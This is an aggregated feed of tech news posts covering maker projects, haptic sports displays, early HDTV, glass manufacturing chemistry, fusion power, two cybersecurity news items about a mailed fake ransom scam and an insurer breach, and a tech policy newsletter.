And so [Hope This Works] started by designing the all-important sprockets. He found a little eight-toothed number on McMaster-Carr and used the drawing for reference. From there, he designed the rest of the parts around the sprockets, adding a base so that it can sit on the desk or be held in the hand.
For now, this proof-of-concept is hand-cranked. We especially love that [Hope This Works] included a square hole for the crank handle to stand in when not in use. Be sure to check out the design/build video after the break to see it in action.
How happy would you be to see Factorio come up in a job interview?
youtube.com/embed/uJ_CC4abBj0?…
Thanks for the tip, [foamyguy]!
Piggyback Board Brings Touch Sensing to USB Soldering Iron
The current generation of USB-powered soldering irons have a lot going for them, chief among them being portability and automatic start and stop. But an iron that turns off in the middle of soldering a joint is a problem, one that this capacitive-touch replacement control module aims to fix.
The iron in question is an SJ1 from Awgem, which [DoganM95] picked up on AliExpress. It seems well-built, with a sturdy aluminum handle, a nice OLED display, and fast heat-up and cool-down. The problem is that the iron is triggered by motion, so if you leave it still for more than a second or two, such as when you’re soldering a big joint, it turns itself off. To fix that, [DoganM95] designed a piggyback board for the OEM controller with a TTP223 capacitive touch sensor. The board is carefully shaped to clear the existing PCB components and the heater cartridge terminals, and has castellated connections so it can mate with pads on the main board. You have to remove one MOSFET from the main board, but that’s about it for modifications. A nickel strip makes contact with the inside of the iron’s shell, turning it into the sensor plate for the TTP223.
[DoganM95] says that the BA6 variant of the chip is the one you want, as others have a 10-second timeout, which would defeat the purpose of the mod. It’s a very nice bit of design work, and we especially like how the mod board nests so nicely onto the OEM controller. It reminds us a little of those Quansheng handy-talkie all-band mods.
FLOSS Weekly Episode 823: TuxCare, 10 Years Without Rebooting!
This week, Jonathan Bennett and Aaron Newcomb talk with Joao Correia about TuxCare! What’s live patching, and why is it so hard? And how is this related to .NET 6? Watch to find out!
youtube.com/embed/tpSChIv7BOI?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/03/05/floss-…
Haptic Displays Bring Sports To The Vision Impaired
When it comes to the majority of sports broadcasting, it’s all about the visual. The commentators call the plays, of course, but everything you’re being shown at home is on a screen. Similarly, if you’re in the stadium, it’s all about getting the best possible view from the best seats in the house.
Ultimately, the action can be a little harder to follow for the vision impaired. However, one company is working hard to make sports more accessible to everyone. Enter OneCourt, and their haptic sports display technology.
Haptic, Fantastic
If you can see, following just about any sport is relatively straightforward. Your eyes pick out the players and the lines on the field, and you can follow the ball or puck wherever it may land. Basically, interpreting a sport is just taking in a ton of positional data—the state of the game is represented by the position of the people and the fundamental game piece involved.
View this post on Instagram
But how do you represent the state of a game to somebody who can’t see? Audio helps, but it’s hard for even the fastest commentator to explain the entire state of the game all at once. As it turns out, touch can be a great tool in this regard. Imagine if you could place your hands down on a football field, and instinctively feel the position of all the players and the ball. That would be impractical, of course, because the field is too big. But if there was a small surface that represented the field in a touchable manner, that might just work.
This is precisely what OneCourt has created. The company realized that many modern professional sports already had high-quality data streams that represented the positions of players and the ball in real time. With the data on hand, they just needed a way to “display” it in a touchable, feelable form. To that end, they created a range of haptic displays that use vibrations to represent the action on the field in a compact tablet-like device. They receive game data over a 5G or WiFi link, and translate it into vibrations across a miniature replica of the playing surface.
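The core of such a device is mapping positional data onto a motor grid, which can be sketched in a few lines. The field dimensions and grid resolution below are hypothetical; OneCourt has not published its actual motor density.

```python
def to_motor_grid(x, y, field=(105.0, 68.0), grid=(24, 16)):
    """Map a ball position in field coordinates (meters) to the index
    of the nearest vibration motor in a coarse haptic grid.

    Hypothetical dimensions: a 105 x 68 m soccer pitch and a 24 x 16
    motor array -- illustrative numbers, not OneCourt's real hardware.
    """
    col = min(int(x / field[0] * grid[0]), grid[0] - 1)
    row = min(int(y / field[1] * grid[1]), grid[1] - 1)
    return row, col

print(to_motor_grid(52.5, 34.0))  # midfield -> (8, 12), near the grid center
```

In practice the device would animate the active motor as the position feed updates, so the user feels the ball travel across the surface.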
youtube.com/embed/5tm8Vo9LnT0?…
OneCourt created a range of devices to suit different sports. A basketball version is marked out with raised lines matching those on the court, and trackable vibrations on the surface tell the user where the ball is going. The company has teamed up to offer devices to spectators going to see the Sacramento Kings and the Portland Trail Blazers at their home games throughout the season. Those visiting the stadium can request to use one of the devices during the game via guest services, and get a greater insight into the play.
The company has also demonstrated a similar device for use at baseball games, with the characteristic diamond laid out on the haptic surface. The devices got a public trial at Dallas’s Globe Life Field last year.
View this post on Instagram
On a technological level, the hardware appears relatively straightforward. The OneCourt devices pack an array of vibration motors into a rectangular surface, controlled by a feed of gamestate data already collected by the professional leagues. For the vision impaired, however, it’s a gamechanger, allowing them to independently “watch” the game in far greater detail than before.
The Portland Trail Blazers were the first NBA team to get on board with the OneCourt devices. Credit: Portland Trail Blazers, press release
For now, the devices are very much in a pilot rollout phase. OneCourt is running activations with individual sports teams to offer the devices to vision impaired spectators at their stadiums. However, the intention is that this technology could also be just as useful for fans tuning into a sports broadcast at home. The company hopes to start pre-orders for individual customers in the near future.
Accessible technology doesn’t always have to be highly advanced or complicated to be useful—or, indeed, fun! Devices like these can open up a whole new world of perception to those that otherwise might find sports difficult or frustrating to follow. Ultimately, that’s a good thing—and something we hope to see more of in future!
Is This The Oldest HD Video Online?
Take a look at this video from [Reely Interesting], showing scenes from traditional Japanese festivals. It’s well filmed, and as with any HD video, you can see real detail. But as you watch, you may see something a little out of the ordinary. It’s got noise, a little bit of distortion, and looking closely at the surroundings, it’s clearly from the 1980s. Something doesn’t add up, as surely we’d expect a video like this to have been shot in glorious 525-line NTSC. In fact, what we’re seeing is a very rare demo reel from 1985, showing off the first commercial HDTV system. This is analogue video in 1035i, and its background, as listed below the video, makes for a very interesting story.
Most of us think of HDTV arriving some time in the 2000s, when Blu-ray and digital broadcasting supplanted the NTSC and PAL systems. But in fact, Japanese companies had been experimenting since the 1960s, and these recordings are among their first fruits. The footage has been digitized from a very rare, still-working Sony HDV-1000 reel-to-reel video recorder, and is thus possibly the oldest HD video viewable online. They’re looking for any HDV-1000 parts, should you happen to have one lying around. Meanwhile, the tape represents a fascinating window into a broadcast history very few of us had a chance to see back in the day.
This isn’t the first time we’ve touched on vintage reel-to-reel video.
youtube.com/embed/2vybIQ5o1yQ?…
Ransomware Now Arrives by Regular Mail! The Innovation Is Signed BianLian. Here’s the Backstory
A new fraud scheme has been identified in the United States: criminals are mailing fake ransom demands on behalf of the BianLian group.
The envelopes list the sender as “BIANLIAN GROUP,” with a return address at an office building in Boston, Massachusetts. The letters were sent to company executives and marked “Urgent, read immediately.” According to the postmarks, they were mailed on February 25, 2025 from a Boston post office.
The contents of each letter are tailored to the recipient’s line of business. Letters sent to healthcare organizations claim that patient and employee data has been stolen, while companies that handle customer orders are threatened with the disclosure of sensitive customer information.
The text claims the attackers gained access to corporate systems and allegedly stole confidential files, including financial statements, tax documents, and employees’ personal data.
Contents of the letter sent to one of the companies (GuidePoint Security)
Unlike genuine BianLian demands, the letters state there will be no further negotiation with victims and give them 10 days to pay the ransom in Bitcoin.
Each letter contains a QR code and a Bitcoin wallet address for transferring amounts from $250,000 to $500,000. For medical companies, the amount is fixed at $350,000.
Wallet addresses for transferring funds in a fake letter (BleepingComputer)
Some of the letters include genuinely leaked passwords to lend the threats credibility. However, researchers have found no evidence of actual cyberattacks. According to the experts at GuidePoint Security, the letters have no connection to the BianLian group and are simply an attempt to intimidate company executives into transferring money to the scammers.
Although the letters pose no immediate threat, IT and security departments should warn their executives about the new scam. These messages are an evolution of scams once widespread via email, now aimed at executives of large companies.
Meanwhile, representatives of the real BianLian group have made no statement.
The article “Ransomware Now Arrives by Regular Mail! The Innovation Is Signed BianLian. Here’s the Backstory” originally appeared on il blog della sicurezza informatica.
Big Chemistry: Glass
Humans have been chemically modifying their world for far longer than you might think. Long before they had the slightest idea of what was happening chemically, they were turning clay into bricks, making cement from limestone, and figuring out how to mix metals in just the right proportions to make useful new alloys like bronze. The chemical principles behind all this could wait; there was a world to build, after all.
Among these early feats of chemical happenstance was the discovery that glass could be made from simple sand. The earliest glass, likely accidentally created by a big fire on a sandy surface, probably wasn’t good for much besides decorations. It wouldn’t have taken long to realize that this stuff was fantastically useful, both as a building material and a tool, and that a pinch of this and a little of that could greatly affect its properties. The chemistry of glass has been finely tuned since those early experiments, and the process has been scaled up to incredible proportions, enough to make glass production one of the largest chemical industries in the world today.
Sand++
When most of us use the word “glass,” we’ve got a pretty clear mental picture of what the term refers to. But from a solid-state chemistry viewpoint, glass means more than the stuff that fills the holes in your walls or makes up that beer bottle in your hand. Glasses, or more correctly glassy solids, are a class of amorphous solids that undergo a glass transition. Unpacking that, amorphous refers to the internal structure of the material, which lacks the long-range structural regularity characteristic of a crystalline solid. Long range in this context is a relative term, and refers to distances of more than a few nanometers.
As for the glass transition bit, that simply refers to the material changing from a brittle, hard solid state to a viscous liquid as it is heated past its glass transition temperature. Coupled together, these properties mean that many materials can be glassy solids, including plastics and metals. For our purposes, though, glass refers to glassy solids made primarily of silicates, with other materials added to change the properties of the finished material.
To understand the amorphous structure of glass, we need to look at the starting material for manufacturing glass: quartz. Quartz is a crystalline solid made from silicon dioxide (SiO2), or silica. Inside the crystal, each silicon atom is bonded to four oxygen atoms, each of which forms a bridge to a neighboring silicon. The result is a regular network of SiO4 tetrahedra, which gives both natural and synthetic quartz many of their useful properties.
When quartz sand is ground up finely and heated above its melting point of 1,700 °C, the rigidly ordered crystal structure is disrupted and a thick, syrupy liquid forms. Cooling that liquid slowly would allow the crystal structure to reform, with the silicon atoms connected by a regular grid of bridging oxygen atoms. Glass production, though, uses faster cooling, which makes it harder for all the oxygen atoms to form bridges between the silicon atoms. The result is a disrupted pattern, with some silicon atoms bonded to four oxygens and some bonded to only two or three. This disrupts the long-range ordering seen in the original quartz crystals and results in the properties we normally associate with glassy solids, such as brittleness, low electrical conductivity, and a high melting temperature.
The crystal structure of silicates is disrupted by sodium, calcium, and aluminum, lowering the melting point and viscosity of soda-lime glass. Source: Mrmw, CC0.
Glass made from pure silica sand is called fused quartz, and while it’s commercially valuable, especially in situations requiring extreme temperature resistance and transparency over a wide range of the optical spectrum, it also has some drawbacks. First, the extreme temperatures needed to melt pure quartz sand require a lot of energy, making fused quartz expensive to produce in bulk. Also, the liquid glass is extremely viscous, making it difficult to form and work.
Luckily, these properties can be altered by adding a few impurities to the melt. Adding about 13% sodium oxide (Na2O), 10% calcium oxide (CaO), and a percent or so of aluminum oxide (Al2O3) dramatically changes the physical and chemical properties of the mix. The sodium oxide generally comes from sodium carbonate (Na2CO3), which is known as soda, and the calcium oxide comes from lime, which is limestone (calcium carbonate) that has been heated. Together, the sodium and the calcium bind to some of the oxygen atoms in the silicates, blocking them from bridging to other silicates. This further disrupts any long-range interactions, lowering the melting point of the mix and decreasing its viscosity. The result is soda-lime glass, which accounts for about 90% of the 130 million tonnes of glass manufactured each year.
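As a rough illustration of what those oxide percentages mean for a batch, here is a sketch of converting them into raw material masses. The recipe fractions come from the paragraph above; the conversion factors are standard molar-mass ratios for carbonates that shed CO2 on melting. The exact proportions of any real commercial recipe will differ.

```python
def batch_mix(glass_kg=100.0):
    """Raw material masses (kg) for a hypothetical soda-lime recipe:
    76% SiO2, 13% Na2O, 10% CaO, 1% Al2O3 in the finished glass.

    Na2O and CaO enter the furnace as carbonates, which lose CO2 when
    melted, so more raw material is charged per kg of retained oxide:
    factor = molar mass(carbonate) / molar mass(oxide).
    """
    recipe = {
        "sand":      0.76 * 1.0,               # SiO2 charged as-is
        "soda ash":  0.13 * (105.99 / 61.98),  # Na2CO3 -> Na2O + CO2
        "limestone": 0.10 * (100.09 / 56.08),  # CaCO3  -> CaO  + CO2
        "alumina":   0.01 * 1.0,
    }
    return {name: glass_kg * f for name, f in recipe.items()}

for name, kg in batch_mix().items():
    print(f"{name:9s} {kg:6.1f} kg")
```

Note that the batch weighs noticeably more than the glass it yields, since the carbonates give up their CO2 in the melt.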
If You Can’t Stand the Heat…
Soda-lime glass is used for everything from food and beverage containers to window glass, with only slight adjustments to the mix of impurities to match the properties of the finished glass to the job. But if there’s one place where plain soda-lime glass falls short, it’s resistance to thermal shock. Thanks to the disruption of long-range interactions between silicates by sodium and calcium, soda-lime glass has a much higher coefficient of thermal expansion (CTE) than fused silica. This makes heating soda-lime glass risky, since the stress caused by expansion or contraction can cause the glass to shatter.
To lower the CTE of soda-lime glass, a small amount of boron trioxide (B2O3) is added to the melt. The boron atoms bind to two oxygen atoms, which forms a bridge between adjacent silicates, albeit slightly longer than an oxygen-only bridge. This would seem to raise the CTE, but boron has another trick up its sleeve. Boron normally only accepts three bonds, but in the presence of alkali metals like sodium, it will accept one more. That means the sodium atoms will bond to the boron, keeping them from blocking more bridging oxygens. The result is borosilicate glass, which has a viscosity low enough to ease manufacturing and a low CTE to withstand thermal shock.
Borosilicate glass has been around for more than a century, most recognizably under the trade name Pyrex. It quickly became a fixture in kitchens around the world as the miracle cookware that could go from refrigerator to oven without shattering. Sadly, Corning no longer sells borosilicate glass cookware in the North American market, opting to sell tempered soda-lime glassware under the Pyrex brand since about 1998. True borosilicate Pyrex glass is now mostly limited to the laboratory and industrial market, although Pyrex cookware is still available in Europe.
The Glassworks
In a way, glass is a bit like electricity, which is largely consumed the instant it’s produced since there aren’t many practical ways to store it at a grid scale. Similarly, glass really can’t be manufactured and stored in bulk the way other materials like aluminum and steel can, and shipping tankers of molten glass from one factory to another is a practical impossibility. So a glasswork generally has a complete manufacturing process under one roof, with raw materials coming in one end and finished products going out the other. This also makes glassworks very large facilities, especially ones that make float glass.
Another way in which glass manufacturing is similar to electric generation is that both are generally continuous processes. Large base load generators are most efficient when they are kept rotating continuously, and spinning them up from a standing start is a long and tedious process. Similarly, glass furnaces, which are often classified by the number of metric tons of melt they can supply per day, can take days or weeks to get up to working temperature. That means the entire glass factory has to be geared around keeping the furnace fed with raw material and ensuring the output is formed into finished products immediately and continuously.
On the supply side of the glassworks is the batch house, which serves as a warehouse for raw material. Sand, soda, lime, and other bulk ingredients arrive by truck or rail and are stored in silos or piled onto the batch house floor. It’s vitally important that the raw ingredients stay clean and dry; the results of a wet mix being dumped into a furnace full of molten glass at 1,500 °C don’t bear thinking about. An important raw material is cullet, which is broken glass either from recycling or from the production process; adding cullet to the mix reduces the energy needed to melt the batch. Ingredients are weighed and mixed in the batch house and transported by conveyors to the dog house, an area directly adjacent to the inlet of the furnace where the mix is prewarmed to remove any remaining moisture before being pushed into the furnace by a pusher arm.
The furnace is made from refractory bricks and usually has a long and broad but fairly shallow pool covered by an arched roof. Most furnaces are heated with natural gas, although some electric arc furnaces are used. The furnace often has two zones, the melting tank and the working tank, which are separated by a wall with narrow openings. The temperatures of the two chambers are maintained at different levels, with the melting tank generally hotter than the working tank. The working tank also sometimes has chlorine gas bubbled through it to consolidate any impurities into a slag that floats to the surface of the melt, where it can be skimmed off and added to the cullet in the batch house.
youtube.com/embed/1HDWJgFLCfA?…
Float, Blow, Press, Repeat
After the furnace, the liquid glass enters the cold end of the glassworks. This is a relative term, of course, since the glass is still incandescent at this point. How it exits the furnace and is formed depends on the finished product. For sheet glass such as architectural glass, the float process is generally used. Liquid glass exiting the furnace is floated on top of a pool of molten tin, which is denser than the glass. The liquid glass spreads out over the surface of the tin, forming wide sheets of perfectly flat glass. The thickness and width of the sheet can be controlled by rollers at the edge of the tin pool, which grab the glass sheet and pull it along.
Float baths can be up to four meters wide and 50 meters or more long, over which length the temperature is gradually reduced from about 1,100 °C to 600 °C. At that point, the glass rolls off the tin bath onto rollers and enters a long annealing oven called a lehr, which drops the temperature over 100 meters or more before the sheets are cut. The edges, which were dimpled by the rollers in the float bath, are cut off by scoring with diamond wheels and snapping with rollers, with the off-cuts added to the cullet in the batch house. The glass ribbon is cut to length by a scoring wheel set at an angle matched to the conveyor’s speed, so that the score runs straight across the moving sheet, and snapped by a conveyor section that rises at just the right moment.
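The cutting geometry above comes down to a little trigonometry: because the ribbon keeps moving while the cutter crosses it, the scoring bridge must be skewed slightly downstream. The speeds below are purely illustrative, not figures from any particular float line.

```python
import math

def bridge_angle_deg(ribbon_speed, cutter_speed):
    """Angle (degrees from perpendicular) at which a traveling score
    bridge must be skewed so its moving cutter leaves a straight,
    square score across a ribbon advancing at ribbon_speed.

    While the cutter crosses the ribbon, the glass moves downstream by
    (ribbon_speed / cutter_speed) per unit of width -- the skew cancels
    that drift. Speeds are illustrative placeholders.
    """
    return math.degrees(math.atan(ribbon_speed / cutter_speed))

print(round(bridge_angle_deg(0.2, 1.0), 1))  # prints 11.3
```

A stationary ribbon would need no skew at all; the faster the line runs relative to the cutter, the steeper the bridge angle gets.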
Float glass often goes through additional post-processing modifications, such as tempering. While it’s still quite hot, float glass can be rapidly cooled with jets of air from above and below. This creates thin layers on both faces that have solidified while the core of the sheet is still fluid; as the core then cools and contracts, it pulls the faces into compression while the core itself ends up in tension. This dramatically toughens the glass compared to plain annealed glass, and when it does break, the opposed forces within the glass force it to shatter into small fragments rather than large shards.
For hollow glass products, the arrangement of the cold end forming machines is a bit different. Rather than flowing horizontally out of the furnace, melted glass drops through holes in the bottom of the tank. Large shears close at intervals to cut the stream of molten glass into precisely sized pieces called gobs, which drop into curved chutes. The chutes rotate to direct the gobs into an automatic molding machine.
Molding something like a bottle is a multistage process, with gobs first formed into a rough hollow shape called a parison. The parison can be formed either by pressing the gob into an upside-down mold with a plunger to form a cavity, or by blowing compressed air into the mold from below. Either way, the parisons are flipped right-side up by the molding machine and moved to a second mold, where the final shape of the bottle is formed by compressed air before being pushed onto a conveyor that takes the bottles to an annealing lehr. The entire process from furnace to formed bottle only takes a few seconds, and never stops.
youtube.com/embed/EL3gy4G0gcY?…
Some glass hollowware products, such as pie plates, baking dishes, and laboratory beakers, do not need to be blown at all. Rather, these are press molded by dropping a gob directly into one half of a mold and pressing it with a matching mold half. The mold halves squeeze the molten glass into its final shape before the mold opens and the formed item is whisked away for annealing.
No matter what the final form of the glass being produced, the degree of coordination required to keep a glass factory running smoothly is pretty amazing. The speed with which ingredients are added to the furnace has to match the speed of finished products being taken off the line at the end, and temperatures have to be rigidly controlled all along the way. All the machinery has to be engineered to withstand lava-like temperatures without breaking down; imagine the mess that would result if a furnace failed with a couple of tonnes of molten glass in it. And the molding machines have to deal with the fact that molds only last a few shifts before they need to be resurfaced, lest imperfections creep into the finished products. This means taking individual molding stations out of service while the rest stay in production, all while maintaining overall throughput.
Cyberattack on Generali España: Yet Another Supply Chain Attack
Generali España, a subsidiary of the insurance group Assicurazioni Generali S.p.A., has suffered unauthorized access to its IT systems. The news was published by VenariX en Español, a platform that monitors cyber threats.
Generali, one of the largest insurance companies in the world, operates in Spain with a wide range of insurance and financial products. According to reports, the company is working to mitigate the risks and protect sensitive customer data. No details have yet been released about possible consequences or stolen information.
This is what the screenshot in VenariX’s tweet reports: “we are obliged to inform you that we have detected a cybersecurity incident at Generali Seguros y Reaseguros, S.A.U., in which a third party accessed our information system by substituting the credentials of an authorized user, exposing part of the information relating to the car insurance policy you took out with us, which we retain from the time the policy was signed in accordance with our legal and contractual obligations.”
Yet Another Supply Chain Attack
The incident therefore qualifies as a supply chain attack, that is, an attack targeting not just a specific company but also its suppliers, partners, and interconnected systems. The supply chain is the entire ecosystem of services, software, and infrastructure an organization relies on to operate. Compromising a single link in the chain can trigger a domino effect, affecting multiple parties and amplifying the impact of the breach.
The EU’s NIS2 directive aims precisely at strengthening supply chain security by imposing stricter obligations on companies classified as “essential” and “important.” Among the new requirements are more rigorous risk management, greater accountability for executives, and closer oversight of incidents involving third-party suppliers.
To defend against these attacks, companies must adopt a cyber-resilience strategy built on three pillars: rigorous vetting of suppliers, continuous network monitoring, and advanced security measures such as network segmentation and zero-trust solutions. Only a proactive approach can reduce the risks and mitigate the effects of any breach.
Generali Spain
Present in Spain since 1834, GENERALI is one of the leading players in the Spanish insurance market. The company has around 2,000 employees and one of the largest advisor networks in the country, with more than 1,600 customer service offices and 10,000 professionals.
GENERALI centers its strategy on delivering an excellent customer experience. To that end, it developed a pioneering survey program called TNPS, through which more than 900,000 surveys are carried out each year to gather customer opinions. The information collected lets the company continuously improve its processes and the quality of its service.
As part of its commitment to innovation as a growth driver, GENERALI offers its customers cutting-edge telematics products and services and private self-service areas such as My GENERALI. All of these developments meet the highest usability standards, so that customers and distribution channels can complete any kind of procedure quickly and easily.
This article was produced using the Recorded Future platform, a strategic partner of Red Hot Cyber and a leader in cyber threat intelligence, providing advanced analysis to identify and counter malicious activity in cyberspace.
The article “Cyberattack on Generali España: Yet Another Supply Chain Attack” originally appeared on il blog della sicurezza informatica.
China Claims Commercial Nuclear Fusion by 2050 as Germany Goes Stellarator
Things are heating up in the world of nuclear fusion research, with most fundamental issues resolved and an increasing rate of announcements being made regarding commercial fusion power. China’s CNNC is one of the most recent voices here, with their statement that they expect to have commercial nuclear fusion plants online by 2050. Although scarce on details, China is one of the leading nations when it comes to nuclear fusion research, with multiple large tokamaks, including the HL-2M and the upcoming CFETR which we covered a few years ago.
Stellaris stellarator. (Credit: Proxima Fusion)
In addition to China’s fusion-related news, a German startup called Proxima Fusion announced their Stellaris commercial fusion plant design concept, with a targeted grid connection by the 2030s. Of note is that this involves a stellarator design, which has the major advantage of inherent plasma stability, dodging the confinement mode and Greenwald density issues that plague tokamaks. The Stellaris design is an evolution of the famous Wendelstein 7-X research stellarator at the Max Planck Institute.
While Wendelstein 7-X was not designed to produce power, it features everything a commercial reactor would need, from the complex coil design and cooled divertors to demonstrated long-term operation. This makes it quite likely that in the coming decades we’ll see the final sprint toward commercial fusion power, with stellarators conceivably emerging as the unlikely winner long before tokamaks cross the finish line.
How to navigate Washington and Brussels: a tech policy guide
ANOTHER WEEK, ANOTHER DIGITAL POLITICS. I'm Mark Scott, and I'll be in Washington next week — come say hello at an event I'm co-hosting on March 11 with Katie Harbath (of the excellent Anchor Change newsletter.)
I'll also be in Geneva on March 24 for a discussion on tech sovereignty and data governance (sign up here) and will be co-hosting another tech policy gathering in London on March 27 (sign up here for details.)
— Under the Trump 2.0 administration, tech policy is now inextricably tied to trade and foreign policy. That's not so different from before.
— The European Commission is reassessing its focus on digital regulation. That change is almost exclusively down to internal, not external, pressures.
— Artificial intelligence companies are in an arms race to sign up as many publishers worldwide to feed their large language models.
Let's get started:
Washington: same message, different delivery
AFTER DONALD TRUMP'S MEETING WITH Volodymyr Zelenskyy in the Oval Office last week, tech policy is certainly not at the top of anyone's agenda when it comes to souring transatlantic relations. But as I get ready for a week in North America (Washington: March 10-12; Montréal: March 13-14), it's time to unpack what the first six weeks of the new Trump administration means, both for America and the rest of the world, when it comes to digital.
At first glance, there appears to be a significant shift. In repeated White House executive orders, directives and policy decisions, the US president has signaled his dislike for greater checks on (American) tech companies. Gone is United States support for the global tax revamp, negotiated by the Organization for Economic Cooperation and Development (OECD). Gone is the support for greater content moderation on social media platforms — and in its place, threats if other countries follow that path. Gone is Washington's support for checks on artificial intelligence, including parts of a Biden-era White House executive order. Gone is support for the TikTok ban within the US — a policy that Trump championed during his first term.
Taken as a whole, it feels like an upending of Washington's consensus that technology firms needed to be reined in; that cooperation with like-minded allies helped promote US economic interests; and that pushing back against foreign adversaries, in the online world, was a national security priority.
And yet, I'm not so sure.
It's sometimes easy to forget how past administrations acted once a new White House resident has his feet under the table. Dating back to Barack Obama's time in charge, consecutive US presidents have repeatedly pushed back against greater checks — from non-US countries — even when they promoted potential curbs at home. Obama, for instance, famously chided members of the European Parliament when they suggested that Google should be broken up. (Let's leave aside the fact that those lawmakers didn't have such powers.) Fast forward a decade, and the European Union has never realistically considered forcing a split of these tech giants. But do you know who has? The US Department of Justice, in its ongoing antitrust lawsuit against Alphabet and its dominance over search.
Let's look at other examples. Both Trump 1.0 and Biden's administrations, collectively, were never that excited about revamping the world's global tax regime — mostly because it would allow others to levy taxes against US tech firms. Washington would still come out net positive under those proposals, based on OECD calculations, as the US would earn additional revenue from taxing non-American firms, too. But the idea that pesky foreigners would impose levies on some of the most prominent US companies was something that garnered bipartisan anger.
Thanks for reading the free version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.
Here's what paid subscribers read in February:
— How changing geopolitics affects platform governance, digital competition, internet governance, trade and data protection. More here
— What happens when the US doesn't follow the game plan in combating 'hybrid warfare'?; What lessons to take from the Paris AI Action Summit?; Fact-checkers underpin crowdsourced 'community notes.' More here.
— Germany's federal election is a reminder we don't know what happens on social media; The first transatlantic fight over digital won't come around social media rules; What the global tax overhaul would have meant for tech. More here.
— In the wake of the German election, we shouldn't claim 'mission accomplished' when it comes to fighting foreign interference. More here.
I can go on. Yes, the Trump administration has a longstanding opinion that all forms of online safety/content moderation regulation represent an illegitimate attack on free speech. I would disagree with that assessment, but that is the current White House's starting point. And yes, current US officials are open about their willingness to use trade sanctions against regions/countries (the EU and United Kingdom have been specifically name-checked for attention) that impose such regimes that Trump 2.0 believes represent unfair trading practices against US firms.
But as someone who had a front row seat to the crafting of the EU's Digital Services Act, I remember well that the former Biden administration equally pushed back hard against what it similarly believed were unfair practices from Brussels primarily targeted at Silicon Valley. Yes, these officials did it mostly behind closed doors and in support of some tech firms. But the message — while not as vocal or transactional as the current White House's — was clear: these content moderation rules are bad, and the EU should cut it out.
Where I do get confused is how part of the Trump 2.0 team appears to be copying, almost word for word, the transparency and accountability parts of international online safety regimes. The same rules, it should be pointed out, that allegedly represent a fundamental threat to people's free speech. The US Federal Trade Commission's recent request for information "regarding technology platform censorship," for instance, includes language around how these firms made their content moderation decisions that would not be out of place in European-style legislation.
"Did the policies or other public-facing representations describe how, when, or under what circumstances the platform would deny or degrade users’ access to its services?," one of the FTC questions asks. "Did the platform offer a meaningful opportunity to challenge or appeal adverse actions that deny, or degrade users’ access, consistent with its users’ reasonable expectations based on its representations?," says another. Those questions are equally at the center of what non-US officials want to understand, too.
I get the public differences between how Trump 2.0 and previous administrations have approached these issues. And on other aspects — particularly in relation to artificial intelligence and short-term equality issues on datasets — there are significant differences.
But when I peel back the rhetoric and look at the underlying policies, what are the differences in how the current White House approaches digital compared to its predecessors? In officials like Michael Kratsios, director of the White House Office of Science and Technology Policy, and Gail Slater, the new head of the US Department of Justice's antitrust division, Trump 2.0 has picked well-qualified policymakers who aren't that different from those in charge only months ago, under Biden.
One group I haven't mentioned is lawmakers in Congress. Sigh. The US House of Representatives and Senate certainly like to talk a good game on digital policy. (Anyone remember Chuck Schumer's AI Insight forums?) But I remain skeptical about any form of tech legislation making its way through Congress — mostly because it's not a high priority in the current political climate.
Some officials talk about renewed impetus for federal privacy rules (I've heard that before.) Others say more targeted legislation around online kids safety could win bipartisan support. Again, I have doubts.
But, if you take the recent US Inflation Reduction Act and US Chips Act — and their impact on the American domestic tech industry, as a whole — then the view of Congress doesn't look too bad. Yes, the future of some of that legislation is in jeopardy under Trump 2.0. But, combined, the laws doubled down on US tech investment; provided federal subsidies to entice companies to spend locally; and positioned the country on a favorable footing in the increasingly geopolitical world that encompasses tech in 2025.
To me, that feels like a pretty familiar pitch no matter who currently resides in the White House.
Chart of the Week
TO COMPETE IN THE CUT-THROAT AI RACE, companies are rushing to pen deals with some of the largest newsletters and media outlets in the world.
The goal? To feed these firms' large language models with high-quality content that can make sophisticated systems more lifelike when they respond to real-world queries.
For publishers, it's a race for survival. Many have argued that AI companies have already scraped their sites — and the New York Times has sued OpenAI and Microsoft. But for others, these tech companies offer a new revenue opportunity to keep their legacy media businesses afloat.
Source: Ezra Eeman — which publishers have signed partnerships with individual AI firms
Brussels: different message, same delivery
CONVENTIONAL WISDOM DICTATES that Brussels is firing on all cylinders. The EU has its shiny online safety rules (the Digital Services Act) and digital antitrust legislation (the Digital Markets Act), as well as the upcoming Artificial Intelligence Act — the world's first comprehensive rulebook for the emerging technology. In Ursula von der Leyen, the returning German head of the European Commission, the EU's executive branch, the 27-country bloc has a leader who helped pass those rules. Now, she's ready to wield them aggressively.
That is outdated thinking.
Yes, the EU is in the midst of implementing new digital rules, many of which have never been tested before. The Digital Markets Act's shift to ex ante oversight, or allowing regulators to determine where market abuse may happen before it occurs, is a significant departure from decades of competition jurisprudence, for instance. The Digital Services Act's transparency and accountability provisions for social media companies and search engines — that do not require platforms to remove legal content, to be clear — are being watched by other countries eager to follow that approach.
And yet, the political and economic winds have significantly shifted in Brussels.
For now, let's leave aside the increasingly fraught relationship between the EU and US after decades of close ties. Within the bloc, ongoing sluggish economic output and a failure by European firms to capture the next generation of technology advances have fundamentally altered how EU officials now approach questions around digital policymaking. At the center of that switch is last year's report from Mario Draghi, the former head of the European Central Bank. In his analysis, the former Italian prime minister blamed overburdensome regulation — including the AI Act and the EU's General Data Protection Regulation, or comprehensive privacy regime — for hamstringing the bloc's economy compared to international rivals.
That ethos has taken hold at the top of the European Commission. I would disagree that all regulation/legislation leads to poor economic outcomes, especially in the digital space. Personally, I think the lack of coordinated EU-wide capital markets and the failure to create a "digital single market" across the 27 countries are more to blame for Europe's lack of tech champions. For me, generations of tech regulation are a secondary issue when, say, a Swedish startup founder cannot easily reach out to an Italian investor to back her company to sell into a unified online market from Finland to Greece. But hey, I'm not a former head of the European Central Bank.
This 'de-regulate at all costs!' mantra is now playing out in how Brussels approaches digital. When I saw Henna Virkkunen, the newly-appointed European Commission executive vice president in charge of tech, at the Paris AI Action Summit, the Finnish politician wanted to talk about the EU's Apply AI Strategy and AI Factories initiative — policies aimed at using public funds to jumpstart European companies' use of the emerging technology. In her 10 minute speech, I counted at least 10 references to "innovation," and only a couple of mentions of "regulation." It's not a perfect metaphor for what's happening. But it's pretty close.
